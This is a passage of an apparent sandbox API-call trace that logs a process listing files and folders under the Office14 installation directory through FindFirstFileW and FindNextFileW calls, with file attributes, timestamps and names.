ftCreationTime.dwHighDateTime=0x1c4a10f, ftLastAccessTime.dwLowDateTime=0x5e953370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9e2a200, ftLastWriteTime.dwHighDateTime=0x1c4a10f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCSBAR.POC", cAlternateFileName="")) returned 1 [0044.130] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0044.130] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4210068 | out: hHeap=0xb10000) returned 1 [0044.130] FindNextFileW (in: hFindFile=0x42321d8, lpFindFileData=0x352f58c | out: lpFindFileData=0x352f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa5ff110, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QUERIES", cAlternateFileName="")) returned 1 [0044.130] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\*", lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa5ff110, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0044.132] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa5ff110, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.132] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49110e00, ftCreationTime.dwHighDateTime=0x1bf97c1, ftLastAccessTime.dwLowDateTime=0xfa5ff110, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x49110e00, ftLastWriteTime.dwHighDateTime=0x1bf97c1, nFileSizeHigh=0x0, nFileSizeLow=0xcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN MoneyCentral Investor Currency Rates.iqy", cAlternateFileName="MSNMON~1.IQY")) returned 1 [0044.132] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0044.133] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4210068 | out: hHeap=0xb10000) returned 1 [0044.133] FindNextFileW (in: hFindFile=0x42321d8, lpFindFileData=0x352f58c | out: lpFindFileData=0x352f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd250400, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x5a84fa90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd250400, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0xc568, dwReserved0=0x0, dwReserved1=0x0, cFileName="RECALL.DLL", cAlternateFileName="")) returned 1 [0044.133] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\*", lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa671530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa671530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0044.134] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa671530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa671530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.134] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc114b600, ftCreationTime.dwHighDateTime=0x1c307de, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc114b600, ftLastWriteTime.dwHighDateTime=0x1c307de, nFileSizeHigh=0x0, nFileSizeLow=0x1d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SOLVSAMP.XLS", cAlternateFileName="")) returned 1 [0044.134] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0044.134] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4210068 | out: hHeap=0xb10000) returned 1 [0044.134] FindNextFileW (in: hFindFile=0x42321d8, lpFindFileData=0x352f58c | out: lpFindFileData=0x352f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd6629a20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x8f968, dwReserved0=0x0, dwReserved1=0x0, cFileName="SAVASWEB.DLL", cAlternateFileName="")) returned 1 [0044.137] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP\\*", lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0044.137] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.137] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0044.137] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0044.137] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4210068 | out: hHeap=0xb10000) returned 1 [0044.137] FindNextFileW (in: hFindFile=0x42321d8, lpFindFileData=0x352f58c | out: lpFindFileData=0x352f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e8d5600, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xde61b8a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7e8d5600, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x3bb598, dwReserved0=0x0, dwReserved1=0x0, cFileName="STSLIST.DLL", cAlternateFileName="")) returned 1 [0044.138] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\*", lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x504da6a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x504da6a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0044.139] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x504da6a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x504da6a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.139] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x52203420, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52203420, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0044.139] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\*", lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x52203420, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52203420, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232318 [0044.143] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x52203420, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52203420, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.144] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d6e4b00, ftCreationTime.dwHighDateTime=0x1ca4888, ftLastAccessTime.dwLowDateTime=0x50526960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1d6e4b00, ftLastWriteTime.dwHighDateTime=0x1ca4888, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACTDIR_M.VST", cAlternateFileName="")) returned 1 [0045.439] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920aaf00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x920aaf00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR10.XLT", cAlternateFileName="")) returned 1 [0045.439] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920aaf00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x920aaf00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR2.XLT", cAlternateFileName="")) returned 1 [0045.440] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920aaf00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x920aaf00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x7800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR3.XLT", cAlternateFileName="")) returned 1 [0045.440] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920aaf00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x920aaf00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR4.XLT", cAlternateFileName="")) returned 1 [0045.440] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920aaf00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x920aaf00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x7800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR5.XLT", cAlternateFileName="")) returned 1 [0045.440] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920aaf00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x920aaf00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR6.XLT", cAlternateFileName="")) returned 1 [0045.440] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x933bdc00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x933bdc00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR7.XLT", cAlternateFileName="")) returned 1 [0045.440] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x933bdc00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x933bdc00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR8.XLT", cAlternateFileName="")) returned 1 [0045.441] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x933bdc00, ftCreationTime.dwHighDateTime=0x1ca48b3, ftLastAccessTime.dwLowDateTime=0xaf5058e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x933bdc00, ftLastWriteTime.dwHighDateTime=0x1ca48b3, nFileSizeHigh=0x0, nFileSizeLow=0x7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADR9.XLT", cAlternateFileName="")) returned 1 [0045.441] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e1bb530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x2941e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApothecaryLetter.dotx", cAlternateFileName="APOTHE~1.DOT")) returned 1 [0045.441] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e1bb530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x2f0f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApothecaryMergeLetter.dotx", cAlternateFileName="APOTHE~2.DOT")) returned 1 [0045.441] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e1bb530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x3462a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApothecaryNewsletter.dotx", cAlternateFileName="APOTHE~3.DOT")) returned 1 [0045.441] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e1bb530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x37879, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApothecaryResume.dotx", cAlternateFileName="APOTHE~4.DOT")) returned 1 [0045.441] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77b91500, ftCreationTime.dwHighDateTime=0x1c7c8e6, ftLastAccessTime.dwLowDateTime=0xfa1fabf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77b91500, ftLastWriteTime.dwHighDateTime=0x1c7c8e6, nFileSizeHigh=0x0, nFileSizeLow=0x47c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BillingStatement.xltx", cAlternateFileName="BILLIN~1.XLT")) returned 1 [0045.442] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e2077f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x5d23e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlackTieLetter.dotx", cAlternateFileName="BLACKT~1.DOT")) returned 1 [0045.442] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e253ab0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x5d2119, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlackTieMergeLetter.dotx", cAlternateFileName="BLACKT~2.DOT")) returned 1 [0045.442] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e2c5ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x96f4b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlackTieNewsletter.dotx", cAlternateFileName="BLACKT~3.DOT")) returned 1 [0045.442] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c49db00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e312190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c49db00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x6724a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlackTieResume.dotx", cAlternateFileName="BLACKT~4.DOT")) returned 1 [0045.442] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe494000, ftCreationTime.dwHighDateTime=0x1ca582b, ftLastAccessTime.dwLowDateTime=0x1e5e5bb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe494000, ftLastWriteTime.dwHighDateTime=0x1ca582b, nFileSizeHigh=0x0, nFileSizeLow=0x4352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Blog.dotx", cAlternateFileName="BLOG~1.DOT")) returned 1 [0045.442] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77b91500, ftCreationTime.dwHighDateTime=0x1c7c8e6, ftLastAccessTime.dwLowDateTime=0xfa1fabf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77b91500, ftLastWriteTime.dwHighDateTime=0x1c7c8e6, nFileSizeHigh=0x0, nFileSizeLow=0x72a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BloodPressureTracker.xltx", cAlternateFileName="BLOODP~1.XLT")) returned 1 [0045.443] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb72000, ftCreationTime.dwHighDateTime=0x1c9d51e, ftLastAccessTime.dwLowDateTime=0xf5a1f3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6eb72000, ftLastWriteTime.dwHighDateTime=0x1c9d51e, nFileSizeHigh=0x0, nFileSizeLow=0x125418, dwReserved0=0x0, dwReserved1=0x0, cFileName="ClassicPhotoAlbum.potx", cAlternateFileName="CLASSI~1.POT")) returned 1 [0045.443] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b535800, ftCreationTime.dwHighDateTime=0x1c9d51e, ftLastAccessTime.dwLowDateTime=0xf5a1f3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x8b535800, ftLastWriteTime.dwHighDateTime=0x1c9d51e, nFileSizeHigh=0x0, nFileSizeLow=0x95482, dwReserved0=0x0, dwReserved1=0x0, cFileName="ContemporaryPhotoAlbum.potx", cAlternateFileName="CONTEM~1.POT")) returned 1 [0045.443] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3aa710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x26022, dwReserved0=0x0, dwReserved1=0x0, cFileName="EquityLetter.Dotx", cAlternateFileName="EQUITY~1.DOT")) returned 1 [0045.443] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3aa710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x145ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="EquityMergeFax.Dotx", cAlternateFileName="EQUITY~2.DOT")) returned 1 [0045.443] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3aa710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x25ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="EquityMergeLetter.Dotx", cAlternateFileName="EQUITY~3.DOT")) returned 1 [0045.448] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e3d0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, 